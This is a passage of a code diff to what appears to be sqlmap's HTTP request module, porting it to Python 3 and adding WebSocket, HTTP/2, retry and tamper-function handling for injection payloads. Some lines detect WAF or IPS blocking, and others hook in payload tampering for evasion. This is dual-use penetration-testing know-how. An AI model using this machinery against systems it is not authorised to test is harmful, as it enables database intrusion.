r"\g<1>\t\g<2>", value) + headers[getBytes(key) if six.PY2 else key] = getBytes(value.strip("\r\n")) # Note: Python3 has_header() expects non-bytes value + + if six.PY2: + url = getBytes(url) # Note: Python3 requires text while Python2 has problems when mixing text with binary POST + + if webSocket: + ws = websocket.WebSocket() + ws.settimeout(WEBSOCKET_INITIAL_TIMEOUT if kb.webSocketRecvCount is None else timeout) + ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie) # WebSocket will add Host field of headers automatically + ws.send(urldecode(post or "")) + + _page = [] + + if kb.webSocketRecvCount is None: + while True: + try: + _page.append(ws.recv()) + except websocket.WebSocketTimeoutException: + kb.webSocketRecvCount = len(_page) + break + else: + for i in xrange(max(1, kb.webSocketRecvCount)): + _page.append(ws.recv()) - post = unicodeencode(post, kb.pageEncoding) + page = "\n".join(_page) - if method: - req = MethodRequest(url, post, headers) - req.set_method(method) - else: - req = urllib2.Request(url, post, headers) + ws.close() + code = ws.status + status = _http_client.responses[code] - requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items()) + class _(dict): + pass - if not getRequestHeader(req, HTTPHEADER.COOKIE) and conf.cj: - conf.cj._policy._now = conf.cj._now = int(time.time()) - cookies = conf.cj._cookies_for_request(req) - requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in 
cookies)) + responseHeaders = _(ws.getheaders()) + responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] - if post is not None: - if not getRequestHeader(req, HTTPHEADER.CONTENT_LENGTH): - requestHeaders += "\n%s: %d" % (string.capwords(HTTPHEADER.CONTENT_LENGTH), len(post)) + requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in responseHeaders.items()]) + requestMsg += "\r\n%s" % requestHeaders - if not getRequestHeader(req, HTTPHEADER.CONNECTION): - requestHeaders += "\n%s: close" % HTTPHEADER.CONNECTION + if post is not None: + requestMsg += "\r\n\r\n%s" % getUnicode(post) - requestMsg += "\n%s" % requestHeaders + requestMsg += "\r\n" - if post is not None: - requestMsg += "\n\n%s" % getUnicode(post) + threadData.lastRequestMsg = requestMsg - requestMsg += "\n" + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + else: + post = getBytes(post) - threadData.lastRequestMsg = requestMsg + if unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST: + if kb.place != HTTPMETHOD.POST: + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + else: + post = urldecode(post, convall=True) + post = encodeBase64(post) + + if target and cmdLineOptions.method or method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST): + req = MethodRequest(url, post, headers) + req.set_method(cmdLineOptions.method or method) + elif url is not None: + req = _urllib.request.Request(url, post, headers) + else: + return None, None, None - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + for function in kb.preprocessFunctions: + try: + function(req) + except Exception as ex: + errMsg = "error occurred while running preprocess " + errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + else: + post, headers = req.data, req.headers - conn = urllib2.urlopen(req) + requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in req.header_items()]) - if not kb.authHeader and getRequestHeader(req, HTTPHEADER.AUTHORIZATION): - kb.authHeader = getRequestHeader(req, HTTPHEADER.AUTHORIZATION) + if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: + conf.cj._policy._now = conf.cj._now = int(time.time()) + with conf.cj._cookies_lock: + cookies = conf.cj._cookies_for_request(req) + requestHeaders += "\r\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) - if not kb.proxyAuthHeader and getRequestHeader(req, HTTPHEADER.PROXY_AUTHORIZATION): - kb.proxyAuthHeader = getRequestHeader(req, HTTPHEADER.PROXY_AUTHORIZATION) + if post is not None: + if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH) and not chunked: + requestHeaders += "\r\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) - # Return response object - if response: - return conn, None, None + if not getRequestHeader(req, HTTP_HEADER.CONNECTION): + requestHeaders += "\r\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive") - # Get HTTP response - if hasattr(conn, 'redurl'): - page = threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ - else Connect._connReadProxy(conn) - skipLogTraffic = kb.redirectChoice == REDIRECTION.NO - code = 
conn.redcode - else: - page = Connect._connReadProxy(conn) + requestMsg += "\r\n%s" % requestHeaders - code = code or conn.code - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) - status = getUnicode(conn.msg) + if post is not None: + requestMsg += "\r\n\r\n%s" % getUnicode(post) - if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: - url = extractRegexResult(META_REFRESH_REGEX, page) + if not chunked: + requestMsg += "\r\n" - debugMsg = "got HTML meta refresh header" - logger.debug(debugMsg) + if conf.cj: + for cookie in conf.cj: + if cookie.value is None: + cookie.value = "" + else: + for char in (r"\r", r"\n"): + cookie.value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", cookie.value) - if kb.alwaysRefresh is None: - msg = "sqlmap got a refresh request " - msg += "(redirect like response common to login pages). " - msg += "Do you want to apply the refresh " - msg += "from now on (or stay on the original page)? [Y/n]" - choice = readInput(msg, default="Y") + if conf.http2: + try: + import httpx + except ImportError: + raise SqlmapMissingDependence("httpx[http2] not available (e.g. 'pip%s install httpx[http2]')" % ('3' if six.PY3 else "")) - kb.alwaysRefresh = choice not in ("n", "N") + if LooseVersion(httpx.__version__) < LooseVersion(MIN_HTTPX_VERSION): + raise SqlmapMissingDependence("outdated version of httpx detected (%s<%s)" % (httpx.__version__, MIN_HTTPX_VERSION)) - if kb.alwaysRefresh: - if url.lower().startswith('http://'): - kwargs['url'] = url + try: + proxy_mounts = dict(("%s://" % key, httpx.HTTPTransport(proxy="%s%s" % ("http://" if "://" not in kb.proxies[key] else "", kb.proxies[key]))) for key in kb.proxies) if kb.proxies else None + with httpx.Client(verify=False, http2=True, timeout=timeout, follow_redirects=True, cookies=conf.cj, mounts=proxy_mounts) as client: + conn = client.request(method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET), url, headers=headers, data=post) + except (httpx.HTTPError, httpx.InvalidURL, httpx.CookieConflict, httpx.StreamError) as ex: + raise _http_client.HTTPException(getSafeExString(ex)) else: - kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url + conn.code = conn.status_code + conn.msg = conn.reason_phrase + conn.info = lambda c=conn: c.headers - threadData.lastRedirectMsg = (threadData.lastRequestUID, page) - kwargs['refreshing'] = True - kwargs['get'] = None - kwargs['post'] = None + conn._read_buffer = conn.read() + conn._read_offset = 0 - try: - return Connect._getPageProxy(**kwargs) - except SqlmapSyntaxException: - pass + requestMsg = re.sub(" HTTP/[0-9.]+\r\n", " %s\r\n" % conn.http_version, requestMsg, count=1) + + if not multipart: + threadData.lastRequestMsg = requestMsg + + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + def _read(count=None): + offset = conn._read_offset + if count is None: + result = conn._read_buffer[offset:] + conn._read_offset = len(conn._read_buffer) + else: + result = conn._read_buffer[offset: offset + count] + conn._read_offset += len(result) + return result + + conn.read = _read + else: + if not multipart: + threadData.lastRequestMsg = requestMsg + + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + conn = _urllib.request.urlopen(req) + + if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): + kb.authHeader = 
getUnicode(getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)) + + if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION): + kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION) + + # Return response object + if response: + return conn, None, None + + # Get HTTP response + if hasattr(conn, "redurl"): + page = (threadData.lastRedirectMsg[1] if kb.choices.redirect == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None + skipLogTraffic = kb.choices.redirect == REDIRECTION.NO + code = conn.redcode if not finalCode else code + else: + page = Connect._connReadProxy(conn) if not skipRead else None + + if conn: + code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes) + responseHeaders = conn.info() + responseHeaders[URI_HTTP_HEADER] = conn.geturl() if hasattr(conn, "geturl") else url + + if getattr(conn, "redurl", None) is not None: + responseHeaders[HTTP_HEADER.LOCATION] = conn.redurl + + responseHeaders = patchHeaders(responseHeaders) + kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader) + else: + code = None + responseHeaders = {} + + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE), percentDecode=not crawling) + status = getUnicode(conn.msg) if conn and getattr(conn, "msg", None) else None + + kb.connErrorCounter = 0 + + if not refreshing: + refresh = responseHeaders.get(HTTP_HEADER.REFRESH, "").split("url=")[-1].strip() + + if extractRegexResult(META_REFRESH_REGEX, page): + refresh = extractRegexResult(META_REFRESH_REGEX, page) + + debugMsg = "got HTML meta refresh header" + logger.debug(debugMsg) + + if not refresh: + refresh = extractRegexResult(JAVASCRIPT_HREF_REGEX, page) + + if refresh: + debugMsg = "got Javascript redirect logic" + logger.debug(debugMsg) + + if refresh: + if kb.alwaysRefresh is None: + msg = "got a refresh intent " + msg += "(redirect like response common to login pages) to '%s'. " % refresh + msg += "Do you want to apply it from now on? 
[Y/n]" + + kb.alwaysRefresh = readInput(msg, default='Y', boolean=True) + + if kb.alwaysRefresh: + if re.search(r"\Ahttps?://", refresh, re.I): + url = refresh + else: + url = _urllib.parse.urljoin(url, refresh) + + threadData.lastRedirectMsg = (threadData.lastRequestUID, page) + kwargs["refreshing"] = True + kwargs["url"] = url + kwargs["get"] = None + kwargs["post"] = None + + try: + return Connect._getPageProxy(**kwargs) + except SqlmapSyntaxException: + pass # Explicit closing of connection object - if not conf.keepAlive: + if conn and not conf.keepAlive: try: - if hasattr(conn.fp, '_sock'): + if hasattr(conn, "fp") and hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() - except Exception, msg: - warnMsg = "problem occured during connection closing ('%s')" % msg - logger.warn(warnMsg) + except Exception as ex: + warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex) + logger.warning(warnMsg) - except urllib2.HTTPError, e: + except SqlmapConnectionException as ex: + if conf.proxyList and not kb.threadException: + warnMsg = "unable to connect to the target URL ('%s')" % getSafeExString(ex) + logger.critical(warnMsg) + threadData.retriesCount = conf.retries + return Connect._retryProxy(**kwargs) + else: + raise + + except _urllib.error.HTTPError as ex: page = None responseHeaders = None + if checking: + return None, None, None + try: - page = e.read() - responseHeaders = e.info() - responseHeaders[URI_HTTP_HEADER] = e.geturl() - page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) + page = ex.read() if not skipRead else None + responseHeaders = ex.info() + responseHeaders[URI_HTTP_HEADER] = ex.geturl() + responseHeaders = patchHeaders(responseHeaders) + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE), percentDecode=not crawling) except socket.timeout: warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.warn(warnMsg) + warnMsg += "to get error page information (%d)" % ex.code + logger.warning(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: - page = page if isinstance(page, unicode) else getUnicode(page) + page = getUnicode(page) - code = e.code - threadData.lastHTTPError = (threadData.lastRequestUID, code) + code = ex.code + status = getUnicode(getattr(ex, "reason", None) or getSafeExString(ex).split(": ", 1)[-1]) + kb.originalCode = kb.originalCode or code + threadData.lastHTTPError = (threadData.lastRequestUID, code, status) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - status = getUnicode(e.msg) - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) - if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + if responseHeaders and getattr(responseHeaders, "headers", None): + logHeaders = "".join(getUnicode(responseHeaders.headers)).strip() - logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) + logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]), start, time.time()) skipLogTraffic = True if conf.verbose <= 5: responseMsg += 
getUnicode(logHeaders) elif conf.verbose > 5: - responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - - if e.code == httplib.UNAUTHORIZED: - errMsg = "not authorized, try to provide right HTTP " - errMsg += "authentication type and valid credentials (%d)" % code - raise SqlmapConnectionException(errMsg) - elif e.code == httplib.NOT_FOUND: - if raise404: - errMsg = "page not found (%d)" % code + responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]) + + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + + if code in conf.abortCode: + errMsg = "aborting due to detected HTTP code '%d'" % code + singleTimeLogMessage(errMsg, logging.CRITICAL) + raise SystemExit + + if ex.code not in (conf.ignoreCode or []): + if ex.code == _http_client.UNAUTHORIZED: + errMsg = "not authorized, try to provide right HTTP " + errMsg += "authentication type and valid credentials (%d). " % code + errMsg += "If this is intended, try to rerun by providing " + errMsg += "a valid value for option '--ignore-code'" raise SqlmapConnectionException(errMsg) + elif chunked and ex.code in (_http_client.METHOD_NOT_ALLOWED, _http_client.LENGTH_REQUIRED): + warnMsg = "turning off HTTP chunked transfer encoding " + warnMsg += "as it seems that the target site doesn't support it (%d)" % code + singleTimeWarnMessage(warnMsg) + conf.chunked = kwargs["chunked"] = False + return Connect.getPage(**kwargs) + elif ex.code == _http_client.REQUEST_URI_TOO_LONG: + warnMsg = "request URI is marked as too long by the target. " + warnMsg += "you are advised to try a switch '--no-cast' and/or '--no-escape'" + singleTimeWarnMessage(warnMsg) + elif ex.code == _http_client.NOT_FOUND: + if raise404: + errMsg = "page not found (%d)" % code + raise SqlmapConnectionException(errMsg) + else: + debugMsg = "page not found (%d)" % code + singleTimeLogMessage(debugMsg, logging.DEBUG) + elif ex.code == _http_client.GATEWAY_TIMEOUT: + if ignoreTimeout: + return None if not conf.ignoreTimeouts else "", None, None + else: + warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, _http_client.responses[ex.code]) + if threadData.retriesCount < conf.retries and not kb.threadException: + warnMsg += ". sqlmap is going to retry the request" + logger.critical(warnMsg) + return Connect._retryProxy(**kwargs) + elif kb.testMode: + logger.critical(warnMsg) + return None, None, None + else: + raise SqlmapConnectionException(warnMsg) else: - debugMsg = "page not found (%d)" % code + debugMsg = "got HTTP error code: %d ('%s')" % (code, status) logger.debug(debugMsg) - processResponse(page, responseHeaders) - elif e.code == httplib.GATEWAY_TIMEOUT: - if ignoreTimeout: - return None, None, None - else: - warnMsg = "unable to connect to the target url (%d - %s)" % (e.code, httplib.responses[e.code]) - if threadData.retriesCount < conf.retries and not kb.threadException: - warnMsg += ". 
sqlmap is going to retry the request" - logger.critical(warnMsg) - return Connect._retryProxy(**kwargs) - elif kb.testMode: - logger.critical(warnMsg) - return None, None, None - else: - raise SqlmapConnectionException(warnMsg) - else: - debugMsg = "got HTTP error code: %d (%s)" % (code, status) - logger.debug(debugMsg) - except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e: + except (_urllib.error.URLError, socket.error, socket.timeout, _http_client.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError, OverflowError, AttributeError, OSError, AssertionError, KeyError): tbMsg = traceback.format_exc() - if "no host given" in tbMsg: - warnMsg = "invalid url address used (%s)" % repr(url) + if conf.debug: + dataToStdout(tbMsg) + + if checking: + return None, None, None + elif "KeyError:" in tbMsg: + if "content-length" in tbMsg: + return None, None, None + else: + raise + elif "AttributeError:" in tbMsg: + if "WSAECONNREFUSED" in tbMsg: + return None, None, None + else: + raise + elif "no host given" in tbMsg: + warnMsg = "invalid URL address used (%s)" % repr(url) raise SqlmapSyntaxException(warnMsg) - elif "forcibly closed" in tbMsg: - warnMsg = "connection was forcibly closed by the target url" + elif any(_ in tbMsg for _ in ("forcibly closed", "Connection is already closed", "ConnectionAbortedError")): + warnMsg = "connection was forcibly closed by the target URL" elif "timed out" in tbMsg: - warnMsg = "connection timed out to the target url" + if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests") + kb.droppingRequests = True + warnMsg = "connection timed out to the target URL" + elif "Connection reset" in tbMsg: + if not conf.disablePrecon: + singleTimeWarnMessage("turning off pre-connect mechanism because of connection reset(s)") + conf.disablePrecon = True + + if kb.testMode: + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests") + kb.droppingRequests = True + warnMsg = "connection reset to the target URL" elif "URLError" in tbMsg or "error" in tbMsg: - warnMsg = "unable to connect to the target url" + warnMsg = "unable to connect to the target URL" + match = re.search(r"Errno \d+\] ([^>\n]+)", tbMsg) + if match: + warnMsg += " ('%s')" % match.group(1).strip() + elif "NTLM" in tbMsg: + warnMsg = "there has been a problem with NTLM authentication" + elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload) + return None, None, None elif "BadStatusLine" in tbMsg: warnMsg = "connection dropped or unknown HTTP " - warnMsg += "status code received. Try to force the HTTP User-Agent " - warnMsg += "header with option '--user-agent' or switch '--random-agent'" + warnMsg += "status code received" + if not conf.agent and not conf.randomAgent: + warnMsg += ". 
Try to force the HTTP User-Agent " + warnMsg += "header with option '--user-agent' or switch '--random-agent'" elif "IncompleteRead" in tbMsg: warnMsg = "there was an incomplete read error while retrieving data " - warnMsg += "from the target url" + warnMsg += "from the target URL" + elif "Handshake status" in tbMsg: + status = re.search(r"Handshake status ([\d]{3})", tbMsg) + errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown" + raise SqlmapConnectionException(errMsg) + elif "SqlmapCompressionException" in tbMsg: + warnMsg = "problems with response (de)compression" + retrying = True else: - warnMsg = "unable to connect to the target url" + warnMsg = "unable to connect to the target URL" - if "BadStatusLine" not in tbMsg: + if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)): warnMsg += " or proxy" + if silent: + return None, None, None + + with kb.locks.connError: + kb.connErrorCounter += 1 + + if kb.connErrorCounter >= MAX_CONSECUTIVE_CONNECTION_ERRORS and kb.choices.connError is None: + message = "there seems to be a continuous problem with connection to the target. " + message += "Are you sure that you want to continue? [y/N] " + + kb.choices.connError = readInput(message, default='N', boolean=True) + + if kb.choices.connError is False: + raise SqlmapSkipTargetException + if "forcibly closed" in tbMsg: logger.critical(warnMsg) return None, None, None - elif silent or (ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead"))): - return None, None, None + elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead", "Interrupted system call")): + return None if not conf.ignoreTimeouts else "", None, None elif threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" - logger.critical(warnMsg) + if not retrying: + warnMsg += "(s)" + logger.critical(warnMsg) + else: + logger.debug(warnMsg) return Connect._retryProxy(**kwargs) - elif kb.testMode: + elif kb.testMode or kb.multiThreadMode: logger.critical(warnMsg) return None, None, None else: raise SqlmapConnectionException(warnMsg) finally: - page = page if isinstance(page, unicode) else getUnicode(page) + for function in kb.postprocessFunctions: + try: + page, responseHeaders, code = function(page, responseHeaders, code) + except Exception as ex: + errMsg = "error occurred while running postprocess " + errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + + if isinstance(page, six.binary_type): + if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): + page = six.text_type(page, errors="ignore") + else: + page = getUnicode(page) + + for _ in (getattr(conn, "redcode", None), code): + if _ is not None and _ in conf.abortCode: + errMsg = "aborting due to detected HTTP code '%d'" % _ + singleTimeLogMessage(errMsg, logging.CRITICAL) + raise SystemExit + + threadData.lastPage = page + threadData.lastCode = code + socket.setdefaulttimeout(conf.timeout) - processResponse(page, responseHeaders) + # Dirty patch for Python3.11.0a7 (e.g. 
https://github.com/sqlmapproject/sqlmap/issues/5091) + if not sys.version.startswith("3.11."): + if conf.retryOn and re.search(conf.retryOn, page, re.I): + if threadData.retriesCount < conf.retries: + warnMsg = "forced retry of the request because of undesired page content" + logger.warning(warnMsg) + return Connect._retryProxy(**kwargs) - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) - if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + processResponse(page, responseHeaders, code, status) if not skipLogTraffic: - logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) + if conn and getattr(conn, "redurl", None): + _ = _urllib.parse.urlsplit(conn.redurl) + _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) + requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", r"\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) + + if kb.resendPostOnRedirect is False: + requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", r"\g<1>GET ", requestMsg) + requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg) + requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg) - if conf.verbose <= 5: - responseMsg += getUnicode(logHeaders) - elif conf.verbose > 5: - responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, conn.code, status) + elif "\n" not in responseMsg: + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) + + if responseHeaders: + logHeaders = "".join(getUnicode(responseHeaders.headers)).strip() + + logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]), start, time.time()) + + if conf.verbose <= 5: + responseMsg += getUnicode(logHeaders) + elif conf.verbose > 5: + responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]) - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) return page, responseHeaders, code @staticmethod - def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): + @stackedmethod + def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False, ignoreSecondOrder=False): """ - This method calls a function to get the target url page content - and returns its page MD5 hash or a boolean value in case of - string match check ('--string' command line parameter) + This method calls a function to get the target URL page content + and returns its page ratio (0 <= ratio <= 1) or a boolean value + representing False/True match in case of !getRatioValue """ if conf.direct: @@ -578,61 +1046,113 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent pageLength = None uri = None code = None - skipUrlEncode = conf.skipUrlEncode if not place: place = kb.injection.place or PLACE.GET + kb.place = place + + if not auxHeaders: + auxHeaders = {} + raise404 = place != PLACE.URI if raise404 is None else raise404 + 
method = method or conf.method + + postUrlEncode = kb.postUrlEncode value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() - if skipUrlEncode is None and conf.httpHeaders: - headers = dict(conf.httpHeaders) - _ = max(headers[_] if _.upper() == HTTPHEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) - if _ and "urlencoded" not in _: - skipUrlEncode = True + if conf.httpHeaders: + headers = OrderedDict(conf.httpHeaders) + contentType = max(headers[_] or "" if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else "" for _ in headers) or None + + if (kb.postHint or conf.skipUrlEncode) and postUrlEncode: + postUrlEncode = False + if not (conf.skipUrlEncode and contentType): # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5092 + conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] + contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) + conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) + if "urlencoded" in contentType: + postUrlEncode = True if payload: - if kb.tamperFunctions: + delimiter = conf.paramDel or (DEFAULT_GET_POST_DELIMITER if place != PLACE.COOKIE else DEFAULT_COOKIE_DELIMITER) + + if not disableTampering and kb.tamperFunctions: for function in kb.tamperFunctions: - payload = function(payload=payload, headers=auxHeaders) - if not isinstance(payload, basestring): - errMsg = "tamper function '%s' returns " % function.func_name + hints = {} + + try: + payload = function(payload=payload, headers=auxHeaders, delimiter=delimiter, hints=hints) + except Exception as ex: + errMsg = "error occurred while running tamper " + errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + + if not isinstance(payload, six.string_types): + errMsg = "tamper function '%s' returns " % function.__name__ errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) - logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) + if hints: + if HINT.APPEND in hints: + value = "%s%s%s" % (value, delimiter, hints[HINT.APPEND]) + + if HINT.PREPEND in hints: + if place == PLACE.URI: + match = re.search(r"\w+\s*=\s*%s" % PAYLOAD_DELIMITER, value) or re.search(r"[^?%s/]=\s*%s" % (re.escape(delimiter), PAYLOAD_DELIMITER), value) + if match: + value = value.replace(match.group(0), "%s%s%s" % (hints[HINT.PREPEND], delimiter, match.group(0))) + else: + value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value) + + logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\')) - if place == PLACE.CUSTOM_POST: + if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts - payload = payload.replace('>', "&gt;").replace('<', "&lt;") + payload = payload.replace("&#", SAFE_HEX_MARKER) + payload = payload.replace('&', "&amp;").replace('>', "&gt;").replace('<', "&lt;").replace('"', "&quot;").replace("'", "&#39;") # Reference: https://stackoverflow.com/a/1091953 + payload = payload.replace(SAFE_HEX_MARKER, "&#") elif kb.postHint == POST_HINT.JSON: - if payload.startswith('"') and payload.endswith('"'): - payload = json.dumps(payload[1:-1]) - else: - payload = json.dumps(payload)[1:-1] + payload = escapeJsonValue(payload) + elif kb.postHint == POST_HINT.JSON_LIKE: + payload = 
payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') + payload = escapeJsonValue(payload) + payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') value = agent.replacePayload(value, payload) else: - if not skipUrlEncode and place in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI): - # GET, POST, URI and Cookie payload needs to be throughly URL encoded - payload = urlencode(payload, '%', False, place != PLACE.URI) - value = agent.replacePayload(value, payload) + # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded + if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper()) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode: + skip = False + + if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper(): + if kb.choices.cookieEncode is None: + msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not 